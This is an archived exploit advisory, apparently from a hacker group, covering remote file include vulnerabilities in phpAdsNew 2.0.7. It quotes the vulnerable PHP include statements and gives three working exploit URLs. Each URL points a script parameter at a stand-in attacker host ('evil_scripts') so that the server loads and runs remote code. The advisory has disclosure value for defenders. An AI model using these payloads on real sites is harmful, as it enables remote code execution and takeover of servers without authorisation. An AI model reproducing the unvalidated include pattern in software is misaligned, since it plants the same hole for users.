TUCoPS :: Web :: PHP :: c07-2010.htm

phpAdsNew 2.0.7 Remote File Include
phpAdsNew 2.0.7 Remote File Include
phpAdsNew 2.0.7 Remote File Include






-----------------------------------------------

phpAdsNew 2.0.7 Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

include_once ($phpAds_geoPlugin);

.......................

function phpAds_ReportGetPluginInfo($filename)
{
	include ($filename);
	return  ($plugin_info_function());
..........................

include ($phpAds_config['my_footer']);


-----------------------------------------------

3xplo!t:


phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts? 

phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts? 

phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts? 



-----------------------------------------------

download: http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip 

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team



                                                    ################################################### 
          
           AsB-MaT.NeT & D4eG.OrG
                                              ###################################################




-- 
_______________________________________________
Get your free email from http://www.hackermail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH